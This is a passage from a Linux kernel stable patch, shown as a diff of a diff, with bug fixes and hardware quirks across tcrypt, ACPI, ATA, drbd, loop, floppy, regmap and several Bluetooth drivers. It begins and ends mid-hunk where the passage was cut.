+-		ret += tcrypt_test("cbc(sm4)");
+-		ret += tcrypt_test("cfb(sm4)");
+-		ret += tcrypt_test("ctr(sm4)");
++		ret = min(ret, tcrypt_test("ecb(sm4)"));
++		ret = min(ret, tcrypt_test("cbc(sm4)"));
++		ret = min(ret, tcrypt_test("cfb(sm4)"));
++		ret = min(ret, tcrypt_test("ctr(sm4)"));
+ 		break;
+ 	case 192:
+-		ret += tcrypt_test("ecb(aria)");
+-		ret += tcrypt_test("cbc(aria)");
+-		ret += tcrypt_test("cfb(aria)");
+-		ret += tcrypt_test("ctr(aria)");
++		ret = min(ret, tcrypt_test("ecb(aria)"));
++		ret = min(ret, tcrypt_test("cbc(aria)"));
++		ret = min(ret, tcrypt_test("cfb(aria)"));
++		ret = min(ret, tcrypt_test("ctr(aria)"));
+ 		break;
+ 	case 200:
+ 		test_cipher_speed("ecb(aes)", ENCRYPT, sec, NULL, 0,
+diff --git a/drivers/acpi/acpica/dsmethod.c b/drivers/acpi/acpica/dsmethod.c
+index ae2e768830bfc..9332bc688713c 100644
+--- a/drivers/acpi/acpica/dsmethod.c
++++ b/drivers/acpi/acpica/dsmethod.c
+@@ -517,7 +517,7 @@ acpi_ds_call_control_method(struct acpi_thread_state *thread,
+ 	info = ACPI_ALLOCATE_ZEROED(sizeof(struct acpi_evaluate_info));
+ 	if (!info) {
+ 		status = AE_NO_MEMORY;
+-		goto cleanup;
++		goto pop_walk_state;
+ 	}
+ 
+ 	info->parameters = &this_walk_state->operands[0];
+@@ -529,7 +529,7 @@ acpi_ds_call_control_method(struct acpi_thread_state *thread,
+ 
+ 	ACPI_FREE(info);
+ 	if (ACPI_FAILURE(status)) {
+-		goto cleanup;
++		goto pop_walk_state;
+ 	}
+ 
+ 	next_walk_state->method_nesting_depth =
+@@ -575,6 +575,12 @@ acpi_ds_call_control_method(struct acpi_thread_state *thread,
+ 
+ 	return_ACPI_STATUS(status);
+ 
++pop_walk_state:
++
++	/* On error, pop the walk state to be deleted from thread */
++
++	acpi_ds_pop_walk_state(thread);
++
+ cleanup:
+ 
+ 	/* On error, we must terminate the method properly */
+diff --git a/drivers/acpi/acpica/utcopy.c b/drivers/acpi/acpica/utcopy.c
+index 400b9e15a709c..63c17f420fb86 100644
+--- a/drivers/acpi/acpica/utcopy.c
++++ b/drivers/acpi/acpica/utcopy.c
+@@ -916,13 +916,6 @@ acpi_ut_copy_ipackage_to_ipackage(union acpi_operand_object *source_obj,
+ 	status = acpi_ut_walk_package_tree(source_obj, dest_obj,
+ 					   acpi_ut_copy_ielement_to_ielement,
+ 					   walk_state);
+-	if (ACPI_FAILURE(status)) {
+-
+-		/* On failure, delete the destination package object */
+-
+-		acpi_ut_remove_reference(dest_obj);
+-	}
+-
+ 	return_ACPI_STATUS(status);
+ }
+ 
+diff --git a/drivers/acpi/ec.c b/drivers/acpi/ec.c
+index 9b42628cf21b3..9751b84c1b221 100644
+--- a/drivers/acpi/ec.c
++++ b/drivers/acpi/ec.c
+@@ -1875,6 +1875,16 @@ static const struct dmi_system_id ec_dmi_table[] __initconst = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "HP Pavilion Gaming Laptop 15-cx0xxx"),
+ 		},
+ 	},
++	{
++		/*
++		 * HP Pavilion Gaming Laptop 15-cx0041ur
++		 */
++		.callback = ec_honor_dsdt_gpe,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "HP"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "HP 15-cx0041ur"),
++		},
++	},
+ 	{
+ 		/*
+ 		 * Samsung hardware
+diff --git a/drivers/acpi/irq.c b/drivers/acpi/irq.c
+index 1cc4647f78b86..c2c786eb95abc 100644
+--- a/drivers/acpi/irq.c
++++ b/drivers/acpi/irq.c
+@@ -94,6 +94,7 @@ EXPORT_SYMBOL_GPL(acpi_unregister_gsi);
+ /**
+  * acpi_get_irq_source_fwhandle() - Retrieve fwhandle from IRQ resource source.
+  * @source: acpi_resource_source to use for the lookup.
++ * @gsi: GSI IRQ number
+  *
+  * Description:
+  * Retrieve the fwhandle of the device referenced by the given IRQ resource
+@@ -297,8 +298,8 @@ EXPORT_SYMBOL_GPL(acpi_irq_get);
+ /**
+  * acpi_set_irq_model - Setup the GSI irqdomain information
+  * @model: the value assigned to acpi_irq_model
+- * @fwnode: the irq_domain identifier for mapping and looking up
+- *          GSI interrupts
++ * @fn: a dispatcher function that will return the domain fwnode
++ *	for a given GSI
+  */
+ void __init acpi_set_irq_model(enum acpi_irq_model_id model,
+ 			       struct fwnode_handle *(*fn)(u32))
+diff --git a/drivers/acpi/pfr_telemetry.c b/drivers/acpi/pfr_telemetry.c
+index 9abf350bd7a5a..27fb6cdad75f9 100644
+--- a/drivers/acpi/pfr_telemetry.c
++++ b/drivers/acpi/pfr_telemetry.c
+@@ -144,7 +144,7 @@ static int get_pfrt_log_data_info(struct pfrt_log_data_info *data_info,
+ 	ret = 0;
+ 
+ free_acpi_buffer:
+-	kfree(out_obj);
++	ACPI_FREE(out_obj);
+ 
+ 	return ret;
+ }
+@@ -180,7 +180,7 @@ static int set_pfrt_log_level(int level, struct pfrt_log_device *pfrt_log_dev)
+ 		ret = -EBUSY;
+ 	}
+ 
+-	kfree(out_obj);
++	ACPI_FREE(out_obj);
+ 
+ 	return ret;
+ }
+@@ -218,7 +218,7 @@ static int get_pfrt_log_level(struct pfrt_log_device *pfrt_log_dev)
+ 	ret = obj->integer.value;
+ 
+ free_acpi_buffer:
+-	kfree(out_obj);
++	ACPI_FREE(out_obj);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/acpi/pfr_update.c b/drivers/acpi/pfr_update.c
+index 6bb0b778b5da5..9d2bdc13253a5 100644
+--- a/drivers/acpi/pfr_update.c
++++ b/drivers/acpi/pfr_update.c
+@@ -178,7 +178,7 @@ static int query_capability(struct pfru_update_cap_info *cap_hdr,
+ 	ret = 0;
+ 
+ free_acpi_buffer:
+-	kfree(out_obj);
++	ACPI_FREE(out_obj);
+ 
+ 	return ret;
+ }
+@@ -224,7 +224,7 @@ static int query_buffer(struct pfru_com_buf_info *info,
+ 	ret = 0;
+ 
+ free_acpi_buffer:
+-	kfree(out_obj);
++	ACPI_FREE(out_obj);
+ 
+ 	return ret;
+ }
+@@ -385,7 +385,7 @@ static int start_update(int action, struct pfru_device *pfru_dev)
+ 	ret = 0;
+ 
+ free_acpi_buffer:
+-	kfree(out_obj);
++	ACPI_FREE(out_obj);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/acpi/processor_idle.c b/drivers/acpi/processor_idle.c
+index acfabfe07c4fa..fc5b5b2c9e819 100644
+--- a/drivers/acpi/processor_idle.c
++++ b/drivers/acpi/processor_idle.c
+@@ -1134,6 +1134,9 @@ static int acpi_processor_get_lpi_info(struct acpi_processor *pr)
+ 	status = acpi_get_parent(handle, &pr_ahandle);
+ 	while (ACPI_SUCCESS(status)) {
+ 		d = acpi_fetch_acpi_dev(pr_ahandle);
++		if (!d)
++			break;
++
+ 		handle = pr_ahandle;
+ 
+ 		if (strcmp(acpi_device_hid(d), ACPI_PROCESSOR_CONTAINER_HID))
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index b2a6162876387..ffa19d418847f 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -132,6 +132,10 @@ static int video_detect_force_none(const struct dmi_system_id *d)
+ }
+ 
+ static const struct dmi_system_id video_detect_dmi_table[] = {
++	/*
++	 * Models which should use the vendor backlight interface,
++	 * because of broken ACPI video backlight control.
++	 */
+ 	{
+ 	 /* https://bugzilla.redhat.com/show_bug.cgi?id=1128309 */
+ 	 .callback = video_detect_force_vendor,
+@@ -197,14 +201,6 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 		DMI_MATCH(DMI_PRODUCT_NAME, "1015CX"),
+ 		},
+ 	},
+-	{
+-	 .callback = video_detect_force_vendor,
+-	 /* GIGABYTE GB-BXBT-2807 */
+-	 .matches = {
+-		DMI_MATCH(DMI_SYS_VENDOR, "GIGABYTE"),
+-		DMI_MATCH(DMI_PRODUCT_NAME, "GB-BXBT-2807"),
+-		},
+-	},
+ 	{
+ 	 .callback = video_detect_force_vendor,
+ 	 /* Samsung N150/N210/N220 */
+@@ -234,18 +230,23 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 	},
+ 	{
+ 	 .callback = video_detect_force_vendor,
+-	 /* Sony VPCEH3U1E */
++	 /* Xiaomi Mi Pad 2 */
+ 	 .matches = {
+-		DMI_MATCH(DMI_SYS_VENDOR, "Sony Corporation"),
+-		DMI_MATCH(DMI_PRODUCT_NAME, "VPCEH3U1E"),
++			DMI_MATCH(DMI_SYS_VENDOR, "Xiaomi Inc"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "Mipad2"),
+ 		},
+ 	},
++
++	/*
++	 * Models which should use the vendor backlight interface,
++	 * because of broken native backlight control.
++	 */
+ 	{
+ 	 .callback = video_detect_force_vendor,
+-	 /* Xiaomi Mi Pad 2 */
++	 /* Sony Vaio PCG-FRV35 */
+ 	 .matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "Xiaomi Inc"),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "Mipad2"),
++		DMI_MATCH(DMI_SYS_VENDOR, "Sony Corporation"),
++		DMI_MATCH(DMI_PRODUCT_NAME, "PCG-FRV35"),
+ 		},
+ 	},
+ 
+@@ -609,6 +610,23 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 		DMI_MATCH(DMI_BOARD_NAME, "N250P"),
+ 		},
+ 	},
++	{
++	 /* https://bugzilla.kernel.org/show_bug.cgi?id=202401 */
++	 .callback = video_detect_force_native,
++	 /* Sony Vaio VPCEH3U1E */
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "Sony Corporation"),
++		DMI_MATCH(DMI_PRODUCT_NAME, "VPCEH3U1E"),
++		},
++	},
++	{
++	 .callback = video_detect_force_native,
++	 /* Sony Vaio VPCY11S1E */
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "Sony Corporation"),
++		DMI_MATCH(DMI_PRODUCT_NAME, "VPCY11S1E"),
++		},
++	},
+ 
+ 	/*
+ 	 * These Toshibas have a broken acpi-video interface for brightness
+@@ -671,6 +689,14 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 		DMI_MATCH(DMI_PRODUCT_NAME, "OptiPlex 9020M"),
+ 		},
+ 	},
++	{
++	 .callback = video_detect_force_none,
++	 /* GIGABYTE GB-BXBT-2807 */
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "GIGABYTE"),
++		DMI_MATCH(DMI_PRODUCT_NAME, "GB-BXBT-2807"),
++		},
++	},
+ 	{
+ 	 .callback = video_detect_force_none,
+ 	 /* MSI MS-7721 */
+diff --git a/drivers/acpi/x86/utils.c b/drivers/acpi/x86/utils.c
+index d7d3f1669d4c0..4e816bb402f68 100644
+--- a/drivers/acpi/x86/utils.c
++++ b/drivers/acpi/x86/utils.c
+@@ -308,7 +308,7 @@ static const struct dmi_system_id acpi_quirk_skip_dmi_ids[] = {
+ 					ACPI_QUIRK_SKIP_ACPI_AC_AND_BATTERY),
+ 	},
+ 	{
+-		/* Lenovo Yoga Tablet 1050F/L */
++		/* Lenovo Yoga Tablet 2 1050F/L */
+ 		.matches = {
+ 			DMI_MATCH(DMI_SYS_VENDOR, "Intel Corp."),
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "VALLEYVIEW C0 PLATFORM"),
+@@ -319,6 +319,27 @@ static const struct dmi_system_id acpi_quirk_skip_dmi_ids[] = {
+ 		.driver_data = (void *)(ACPI_QUIRK_SKIP_I2C_CLIENTS |
+ 					ACPI_QUIRK_SKIP_ACPI_AC_AND_BATTERY),
+ 	},
++	{
++		/* Lenovo Yoga Tab 3 Pro X90F */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Intel Corporation"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "CHERRYVIEW D1 PLATFORM"),
++			DMI_MATCH(DMI_PRODUCT_VERSION, "Blade3-10A-001"),
++		},
++		.driver_data = (void *)(ACPI_QUIRK_SKIP_I2C_CLIENTS |
++					ACPI_QUIRK_SKIP_ACPI_AC_AND_BATTERY),
++	},
++	{
++		/* Medion Lifetab S10346 */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "AMI Corporation"),
++			DMI_MATCH(DMI_BOARD_NAME, "Aptio CRB"),
++			/* Way too generic, also match on BIOS data */
++			DMI_MATCH(DMI_BIOS_DATE, "10/22/2015"),
++		},
++		.driver_data = (void *)(ACPI_QUIRK_SKIP_I2C_CLIENTS |
++					ACPI_QUIRK_SKIP_ACPI_AC_AND_BATTERY),
++	},
+ 	{
+ 		/* Nextbook Ares 8 */
+ 		.matches = {
+@@ -348,6 +369,7 @@ static const struct acpi_device_id i2c_acpi_known_good_ids[] = {
+ 	{ "10EC5640", 0 }, /* RealTek ALC5640 audio codec */
+ 	{ "INT33F4", 0 },  /* X-Powers AXP288 PMIC */
+ 	{ "INT33FD", 0 },  /* Intel Crystal Cove PMIC */
++	{ "INT34D3", 0 },  /* Intel Whiskey Cove PMIC */
+ 	{ "NPCE69A", 0 },  /* Asus Transformer keyboard dock */
+ 	{}
+ };
+diff --git a/drivers/ata/libata-sata.c b/drivers/ata/libata-sata.c
+index b6806d41a8c50..fd4dccc253896 100644
+--- a/drivers/ata/libata-sata.c
++++ b/drivers/ata/libata-sata.c
+@@ -1392,7 +1392,8 @@ static int ata_eh_read_log_10h(struct ata_device *dev,
+ 	tf->hob_lbah = buf[10];
+ 	tf->nsect = buf[12];
+ 	tf->hob_nsect = buf[13];
+-	if (dev->class == ATA_DEV_ZAC && ata_id_has_ncq_autosense(dev->id))
++	if (dev->class == ATA_DEV_ZAC && ata_id_has_ncq_autosense(dev->id) &&
++	    (tf->status & ATA_SENSE))
+ 		tf->auxiliary = buf[14] << 16 | buf[15] << 8 | buf[16];
+ 
+ 	return 0;
+@@ -1456,8 +1457,12 @@ void ata_eh_analyze_ncq_error(struct ata_link *link)
+ 	memcpy(&qc->result_tf, &tf, sizeof(tf));
+ 	qc->result_tf.flags = ATA_TFLAG_ISADDR | ATA_TFLAG_LBA | ATA_TFLAG_LBA48;
+ 	qc->err_mask |= AC_ERR_DEV | AC_ERR_NCQ;
+-	if (dev->class == ATA_DEV_ZAC &&
+-	    ((qc->result_tf.status & ATA_SENSE) || qc->result_tf.auxiliary)) {
++
++	/*
++	 * If the device supports NCQ autosense, ata_eh_read_log_10h() will have
++	 * stored the sense data in qc->result_tf.auxiliary.
++	 */
++	if (qc->result_tf.auxiliary) {
+ 		char sense_key, asc, ascq;
+ 
+ 		sense_key = (qc->result_tf.auxiliary >> 16) & 0xff;
+diff --git a/drivers/base/class.c b/drivers/base/class.c
+index 64f7b9a0970f7..8ceafb7d0203b 100644
+--- a/drivers/base/class.c
++++ b/drivers/base/class.c
+@@ -192,6 +192,11 @@ int __class_register(struct class *cls, struct lock_class_key *key)
+ 	}
+ 	error = class_add_groups(class_get(cls), cls->class_groups);
+ 	class_put(cls);
++	if (error) {
++		kobject_del(&cp->subsys.kobj);
++		kfree_const(cp->subsys.kobj.name);
++		kfree(cp);
++	}
+ 	return error;
+ }
+ EXPORT_SYMBOL_GPL(__class_register);
+diff --git a/drivers/base/power/runtime.c b/drivers/base/power/runtime.c
+index b52049098d4ee..14088b5adb556 100644
+--- a/drivers/base/power/runtime.c
++++ b/drivers/base/power/runtime.c
+@@ -484,7 +484,17 @@ static int rpm_idle(struct device *dev, int rpmflags)
+ 
+ 	dev->power.idle_notification = true;
+ 
+-	retval = __rpm_callback(callback, dev);
++	if (dev->power.irq_safe)
++		spin_unlock(&dev->power.lock);
++	else
++		spin_unlock_irq(&dev->power.lock);
++
++	retval = callback(dev);
++
++	if (dev->power.irq_safe)
++		spin_lock(&dev->power.lock);
++	else
++		spin_lock_irq(&dev->power.lock);
+ 
+ 	dev->power.idle_notification = false;
+ 	wake_up_all(&dev->power.wait_queue);
+diff --git a/drivers/base/regmap/regmap-irq.c b/drivers/base/regmap/regmap-irq.c
+index 4ef9488d05cde..3de89795f5843 100644
+--- a/drivers/base/regmap/regmap-irq.c
++++ b/drivers/base/regmap/regmap-irq.c
+@@ -722,6 +722,7 @@ int regmap_add_irq_chip_fwnode(struct fwnode_handle *fwnode,
+ 	int i;
+ 	int ret = -ENOMEM;
+ 	int num_type_reg;
++	int num_regs;
+ 	u32 reg;
+ 
+ 	if (chip->num_regs <= 0)
+@@ -796,14 +797,20 @@ int regmap_add_irq_chip_fwnode(struct fwnode_handle *fwnode,
+ 			goto err_alloc;
+ 	}
+ 
+-	num_type_reg = chip->type_in_mask ? chip->num_regs : chip->num_type_reg;
+-	if (num_type_reg) {
+-		d->type_buf_def = kcalloc(num_type_reg,
++	/*
++	 * Use num_config_regs if defined, otherwise fall back to num_type_reg
++	 * to maintain backward compatibility.
++	 */
++	num_type_reg = chip->num_config_regs ? chip->num_config_regs
++			: chip->num_type_reg;
++	num_regs = chip->type_in_mask ? chip->num_regs : num_type_reg;
++	if (num_regs) {
++		d->type_buf_def = kcalloc(num_regs,
+ 					  sizeof(*d->type_buf_def), GFP_KERNEL);
+ 		if (!d->type_buf_def)
+ 			goto err_alloc;
+ 
+-		d->type_buf = kcalloc(num_type_reg, sizeof(*d->type_buf),
++		d->type_buf = kcalloc(num_regs, sizeof(*d->type_buf),
+ 				      GFP_KERNEL);
+ 		if (!d->type_buf)
+ 			goto err_alloc;
+diff --git a/drivers/block/drbd/drbd_main.c b/drivers/block/drbd/drbd_main.c
+index 8532b839a3435..6772402326842 100644
+--- a/drivers/block/drbd/drbd_main.c
++++ b/drivers/block/drbd/drbd_main.c
+@@ -2217,7 +2217,8 @@ void drbd_destroy_device(struct kref *kref)
+ 		kref_put(&peer_device->connection->kref, drbd_destroy_connection);
+ 		kfree(peer_device);
+ 	}
+-	memset(device, 0xfd, sizeof(*device));
++	if (device->submit.wq)
++		destroy_workqueue(device->submit.wq);
+ 	kfree(device);
+ 	kref_put(&resource->kref, drbd_destroy_resource);
+ }
+@@ -2309,7 +2310,6 @@ void drbd_destroy_resource(struct kref *kref)
+ 	idr_destroy(&resource->devices);
+ 	free_cpumask_var(resource->cpu_mask);
+ 	kfree(resource->name);
+-	memset(resource, 0xf2, sizeof(*resource));
+ 	kfree(resource);
+ }
+ 
+@@ -2650,7 +2650,6 @@ void drbd_destroy_connection(struct kref *kref)
+ 	drbd_free_socket(&connection->data);
+ 	kfree(connection->int_dig_in);
+ 	kfree(connection->int_dig_vv);
+-	memset(connection, 0xfc, sizeof(*connection));
+ 	kfree(connection);
+ 	kref_put(&resource->kref, drbd_destroy_resource);
+ }
+@@ -2774,7 +2773,7 @@ enum drbd_ret_code drbd_create_device(struct drbd_config_context *adm_ctx, unsig
+ 
+ 	err = add_disk(disk);
+ 	if (err)
+-		goto out_idr_remove_from_resource;
++		goto out_destroy_workqueue;
+ 
+ 	/* inherit the connection state */
+ 	device->state.conn = first_connection(resource)->cstate;
+@@ -2788,6 +2787,8 @@ enum drbd_ret_code drbd_create_device(struct drbd_config_context *adm_ctx, unsig
+ 	drbd_debugfs_device_add(device);
+ 	return NO_ERROR;
+ 
++out_destroy_workqueue:
++	destroy_workqueue(device->submit.wq);
+ out_idr_remove_from_resource:
+ 	for_each_connection_safe(connection, n, resource) {
+ 		peer_device = idr_remove(&connection->peer_devices, vnr);
+diff --git a/drivers/block/drbd/drbd_nl.c b/drivers/block/drbd/drbd_nl.c
+index 864c98e748757..249eba7d21c28 100644
+--- a/drivers/block/drbd/drbd_nl.c
++++ b/drivers/block/drbd/drbd_nl.c
+@@ -1210,6 +1210,7 @@ static void decide_on_discard_support(struct drbd_device *device,
+ 	struct drbd_connection *connection =
+ 		first_peer_device(device)->connection;
+ 	struct request_queue *q = device->rq_queue;
++	unsigned int max_discard_sectors;
+ 
+ 	if (bdev && !bdev_max_discard_sectors(bdev->backing_bdev))
+ 		goto not_supported;
+@@ -1230,15 +1231,14 @@ static void decide_on_discard_support(struct drbd_device *device,
+ 	 * topology on all peers.
+ 	 */
+ 	blk_queue_discard_granularity(q, 512);
+-	q->limits.max_discard_sectors = drbd_max_discard_sectors(connection);
+-	q->limits.max_write_zeroes_sectors =
+-		drbd_max_discard_sectors(connection);
++	max_discard_sectors = drbd_max_discard_sectors(connection);
++	blk_queue_max_discard_sectors(q, max_discard_sectors);
++	blk_queue_max_write_zeroes_sectors(q, max_discard_sectors);
+ 	return;
+ 
+ not_supported:
+ 	blk_queue_discard_granularity(q, 0);
+-	q->limits.max_discard_sectors = 0;
+-	q->limits.max_write_zeroes_sectors = 0;
++	blk_queue_max_discard_sectors(q, 0);
+ }
+ 
+ static void fixup_write_zeroes(struct drbd_device *device, struct request_queue *q)
+diff --git a/drivers/block/floppy.c b/drivers/block/floppy.c
+index ccad3d7b3ddd9..487840e3564df 100644
+--- a/drivers/block/floppy.c
++++ b/drivers/block/floppy.c
+@@ -4593,8 +4593,10 @@ static int __init do_floppy_init(void)
+ 			goto out_put_disk;
+ 
+ 		err = floppy_alloc_disk(drive, 0);
+-		if (err)
++		if (err) {
++			blk_mq_free_tag_set(&tag_sets[drive]);
+ 			goto out_put_disk;
++		}
+ 
+ 		timer_setup(&motor_off_timer[drive], motor_off_callback, 0);
+ 	}
+diff --git a/drivers/block/loop.c b/drivers/block/loop.c
+index ad92192c7d617..d12d3d171ec4c 100644
+--- a/drivers/block/loop.c
++++ b/drivers/block/loop.c
+@@ -1773,7 +1773,16 @@ static const struct block_device_operations lo_fops = {
+ /*
+  * And now the modules code and kernel interface.
+  */
+-static int max_loop;
++
++/*
++ * If max_loop is specified, create that many devices upfront.
++ * This also becomes a hard limit. If max_loop is not specified,
++ * create CONFIG_BLK_DEV_LOOP_MIN_COUNT loop devices at module
++ * init time. Loop devices can be requested on-demand with the
++ * /dev/loop-control interface, or be instantiated by accessing
++ * a 'dead' device node.
++ */
++static int max_loop = CONFIG_BLK_DEV_LOOP_MIN_COUNT;
+ module_param(max_loop, int, 0444);
+ MODULE_PARM_DESC(max_loop, "Maximum number of loop devices");
+ module_param(max_part, int, 0444);
+@@ -2181,7 +2190,7 @@ MODULE_ALIAS("devname:loop-control");
+ 
+ static int __init loop_init(void)
+ {
+-	int i, nr;
++	int i;
+ 	int err;
+ 
+ 	part_shift = 0;
+@@ -2209,19 +2218,6 @@ static int __init loop_init(void)
+ 		goto err_out;
+ 	}
+ 
+-	/*
+-	 * If max_loop is specified, create that many devices upfront.
+-	 * This also becomes a hard limit. If max_loop is not specified,
+-	 * create CONFIG_BLK_DEV_LOOP_MIN_COUNT loop devices at module
+-	 * init time. Loop devices can be requested on-demand with the
+-	 * /dev/loop-control interface, or be instantiated by accessing
+-	 * a 'dead' device node.
+-	 */
+-	if (max_loop)
+-		nr = max_loop;
+-	else
+-		nr = CONFIG_BLK_DEV_LOOP_MIN_COUNT;
+-
+ 	err = misc_register(&loop_misc);
+ 	if (err < 0)
+ 		goto err_out;
+@@ -2233,7 +2229,7 @@ static int __init loop_init(void)
+ 	}
+ 
+ 	/* pre-create number of devices given by config or max_loop */
+-	for (i = 0; i < nr; i++)
++	for (i = 0; i < max_loop; i++)
+ 		loop_add(i);
+ 
+ 	printk(KERN_INFO "loop: module loaded\n");
+diff --git a/drivers/bluetooth/btintel.c b/drivers/bluetooth/btintel.c
+index a657e9a3e96a5..f6b4b7a1be4cc 100644
+--- a/drivers/bluetooth/btintel.c
++++ b/drivers/bluetooth/btintel.c
+@@ -2524,7 +2524,7 @@ static int btintel_setup_combined(struct hci_dev *hdev)
+ 		 */
+ 		err = btintel_read_version(hdev, &ver);
+ 		if (err)
+-			return err;
++			break;
+ 
+ 		/* Apply the device specific HCI quirks
+ 		 *
+@@ -2566,7 +2566,8 @@ static int btintel_setup_combined(struct hci_dev *hdev)
+ 	default:
+ 		bt_dev_err(hdev, "Unsupported Intel hw variant (%u)",
+ 			   INTEL_HW_VARIANT(ver_tlv.cnvi_bt));
+-		return -EINVAL;
++		err = -EINVAL;
++		break;
+ 	}
+ 
+ exit_error:
+diff --git a/drivers/bluetooth/btusb.c b/drivers/bluetooth/btusb.c
+index f05018988a177..6beafd62d7226 100644
+--- a/drivers/bluetooth/btusb.c
++++ b/drivers/bluetooth/btusb.c
+@@ -802,13 +802,13 @@ static inline void btusb_free_frags(struct btusb_data *data)
+ 
+ 	spin_lock_irqsave(&data->rxlock, flags);
+ 
+-	kfree_skb(data->evt_skb);
++	dev_kfree_skb_irq(data->evt_skb);
+ 	data->evt_skb = NULL;
+ 
+-	kfree_skb(data->acl_skb);
++	dev_kfree_skb_irq(data->acl_skb);
+ 	data->acl_skb = NULL;
+ 
+-	kfree_skb(data->sco_skb);
++	dev_kfree_skb_irq(data->sco_skb);
+ 	data->sco_skb = NULL;
+ 
+ 	spin_unlock_irqrestore(&data->rxlock, flags);
+diff --git a/drivers/bluetooth/hci_bcm.c b/drivers/bluetooth/hci_bcm.c
+index d7e0b75db8a60..2b6c0e1922cb3 100644
+--- a/drivers/bluetooth/hci_bcm.c
++++ b/drivers/bluetooth/hci_bcm.c
+@@ -53,11 +53,13 @@
+  * struct bcm_device_data - device specific data
+  * @no_early_set_baudrate: Disallow set baudrate before driver setup()
+  * @drive_rts_on_open: drive RTS signal on ->open() when platform requires it
++ * @no_uart_clock_set: UART clock set command for >3Mbps mode is unavailable
+  * @max_autobaud_speed: max baudrate supported by device in autobaud mode
+  */
+ struct bcm_device_data {
+ 	bool	no_early_set_baudrate;
+ 	bool	drive_rts_on_open;
++	bool	no_uart_clock_set;
+ 	u32	max_autobaud_speed;
+ };
+ 
+@@ -100,6 +102,7 @@ struct bcm_device_data {
+  * @is_suspended: whether flow control is currently disabled
+  * @no_early_set_baudrate: don't set_baudrate before setup()
+  * @drive_rts_on_open: drive RTS signal on ->open() when platform requires it
++ * @no_uart_clock_set: UART clock set command for >3Mbps mode is unavailable
+  * @pcm_int_params: keep the initial PCM configuration
+  * @use_autobaud_mode: start Bluetooth device in autobaud mode
+  * @max_autobaud_speed: max baudrate supported by device in autobaud mode
+@@ -140,6 +143,7 @@ struct bcm_device {
+ #endif
+ 	bool			no_early_set_baudrate;
+ 	bool			drive_rts_on_open;
++	bool			no_uart_clock_set;
+ 	bool			use_autobaud_mode;
+ 	u8			pcm_int_params[5];
+ 	u32			max_autobaud_speed;
+@@ -172,10 +176,11 @@ static inline void host_set_baudrate(struct hci_uart *hu, unsigned int speed)
+ static int bcm_set_baudrate(struct hci_uart *hu, unsigned int speed)
+ {
+ 	struct hci_dev *hdev = hu->hdev;
++	struct bcm_data *bcm = hu->priv;
+ 	struct sk_buff *skb;
+ 	struct bcm_update_uart_baud_rate param;
+ 
+-	if (speed > 3000000) {
++	if (speed > 3000000 && !bcm->dev->no_uart_clock_set) {
+ 		struct bcm_write_uart_clock_setting clock;
+ 
+ 		clock.type = BCM_UART_CLOCK_48MHZ;
+@@ -1529,6 +1534,7 @@ static int bcm_serdev_probe(struct serdev_device *serdev)
+ 		bcmdev->max_autobaud_speed = data->max_autobaud_speed;
+ 		bcmdev->no_early_set_baudrate = data->no_early_set_baudrate;
+ 		bcmdev->drive_rts_on_open = data->drive_rts_on_open;
++		bcmdev->no_uart_clock_set = data->no_uart_clock_set;
+ 	}
+ 
+ 	return hci_uart_register_device(&bcmdev->serdev_hu, &bcm_proto);
+@@ -1550,6 +1556,10 @@ static struct bcm_device_data bcm43438_device_data = {
+ 	.drive_rts_on_open = true,
+ };
+ 
++static struct bcm_device_data cyw4373a0_device_data = {
++	.no_uart_clock_set = true,
++};
++
+ static struct bcm_device_data cyw55572_device_data = {
+ 	.max_autobaud_speed = 921600,
+ };
+@@ -1566,6 +1576,7 @@ static const struct of_device_id bcm_bluetooth_of_match[] = {
+ 	{ .compatible = "brcm,bcm4349-bt", .data = &bcm43438_device_data },
+ 	{ .compatible = "brcm,bcm43540-bt", .data = &bcm4354_device_data },
+ 	{ .compatible = "brcm,bcm4335a0" },
++	{ .compatible = "cypress,cyw4373a0-bt", .data = &cyw4373a0_device_data },
+ 	{ .compatible = "infineon,cyw55572-bt", .data = &cyw55572_device_data },
+ 	{ },
+ };
+diff --git a/drivers/bluetooth/hci_bcsp.c b/drivers/bluetooth/hci_bcsp.c
+index cf4a560958173..8055f63603f45 100644
+--- a/drivers/bluetooth/hci_bcsp.c
++++ b/drivers/bluetooth/hci_bcsp.c
+@@ -378,7 +378,7 @@ static void bcsp_pkt_cull(struct bcsp_struct *bcsp)
+ 		i++;
+ 
+ 		__skb_unlink(skb, &bcsp->unack);
+-		kfree_skb(skb);
++		dev_kfree_skb_irq(skb);
+ 	}
+ 
+ 	if (skb_queue_empty(&bcsp->unack))
+diff --git a/drivers/bluetooth/hci_h5.c b/drivers/bluetooth/hci_h5.c
+index c5a0409ef84fd..6455bc4fb5bb3 100644
+--- a/drivers/bluetooth/hci_h5.c
++++ b/drivers/bluetooth/hci_h5.c
+@@ -313,7 +313,7 @@ static void h5_pkt_cull(struct h5 *h5)
+ 			break;
+ 
+ 		__skb_unlink(skb, &h5->unack);
+-		kfree_skb(skb);
++		dev_kfree_skb_irq(skb);
+ 	}
+ 
+ 	if (skb_queue_empty(&h5->unack))
+diff --git a/drivers/bluetooth/hci_ll.c b/drivers/bluetooth/hci_ll.c
+index 4eb420a9ed04e..5abc01a2acf72 100644
+--- a/drivers/bluetooth/hci_ll.c
++++ b/drivers/bluetooth/hci_ll.c
+@@ -345,7 +345,7 @@ static int ll_enqueue(struct hci_uart *hu, struct sk_buff *skb)
+ 	default:
